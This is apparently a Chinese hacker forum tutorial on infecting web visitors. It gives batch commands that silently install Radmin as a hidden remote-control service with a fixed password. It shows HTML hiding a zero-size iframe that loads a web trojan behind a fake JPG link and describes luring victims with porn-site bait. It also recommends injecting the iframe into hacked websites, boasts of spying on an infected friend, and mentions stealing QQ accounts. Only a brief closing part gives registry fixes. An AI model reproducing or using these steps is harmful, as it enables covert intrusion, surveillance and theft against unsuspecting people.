可怕的网页入侵------------------
各位网友大家好:好久没有做教程了、今天没事做给大家做一个、这个方法以有人会了、但我发现还有好多菜鸟朋友不会、动画有不足之处还请朋友能批评指教!便于改进!
工具软件:
1、超级网页木马生成器
2、HBP_RAdmin2.1_HQB
3、网页空间一个(网上有好多免费的)
一、radmin的安装与配置。
1,安装Radmin.
2,在本机安装Radmin。(看我设置)
端口:4321 密码:11111111
3,导出注册表HKEY_LOCAL_MACHINE\SYSTEM\RADMIN为radmin.reg文件
4,在RADMIN的根目录找到AdmDLL.dll、raddrv.dll、r_server.exe这三个文件和radmin.reg拷贝到一个文件夹
5,建立一个批处理文件。如容如下。
期regedit /s radmin.reg 将radmin.reg的内容导入注册表
r_server.exe /install /silence 安装radmin为服务方式
net start r_server 启动radmin
6,然后做成自解压文件!将做好的自解文件改名为#。
二、制作网页木马。
1、超级网页木马生成器生成木马文件。OK
2、JPG木马图片网页代码、用记事本打开输入以下代码另存为**.jpg
<html>
<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
当然代码可以自己编写!
真实的木马地址是:http:///temp/icyfox.htm
要发给网友的是:http:///temp/plmm.jpg 是这个图片地址!
所有工作完成后就进入下一步-----------------------
3、上传网页。
然后把这个地址http:///temp/plmm.jpg 给别人看就中了!
共上传三个文件:icyfox.htm、icyfox.js、mmhk.jpg
三、测试------------
1、本机测试。
本机IP:127.0.0.1 端口:4321 密码:11111111
先停用了本机刚才安装的RADMIN服务本机没有中马吧,本机测试成功OK
在打开网页http:///temp/plmm.jpg
2、找肉鸡测试。
http:///temp/plmm.jpg
黄色网站看看(对什么人就说什么话便于他上当)
多给几个发
这个不怕毒力害吧!这小子是我朋友,他还没有中,有可能是怕上当,没事我们在找别人,
哈哈他中了,我们来看看他的什么破杀毒软件,他在看录相呢,OK肉鸡测试也成功,
这小子电脑不能充QB,要不就成我的了,他是陕西用户,在陕西有好多地区不能充QB的,
要不还可以通过这个方法弄QB.当然你也可以用这个方法做盗QQ的网页,记住,不能搞破坏哦,
欢迎光临本人的小站:http
:// 动画结束如果有什么不懂的可以请教我.本人技术不高但
能懂的如果可以一定会给你说的.88
黑山老妖
备注:--------------------------------------------
如果要想成功机率高还是入侵别人的网站在对方
网页中加入以下代码!
在网页找一位置插入以下代码:
</html><iframe src="你的木马地址" name="zhu" width="0" height="0" frameborder="0">
在win98.winme.win2000.winxp.win2003下均测试成功!
弥补漏洞
修改本地安全属性,相应的注册表键值为:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
下的1004项的值由原来的0改为十六进制的3
或者去掉mhtml协议:HKEY_CLASSES_ROOT\PROTOCOLS\Handler\mhtml
当然最好的办法是安装对应的补丁!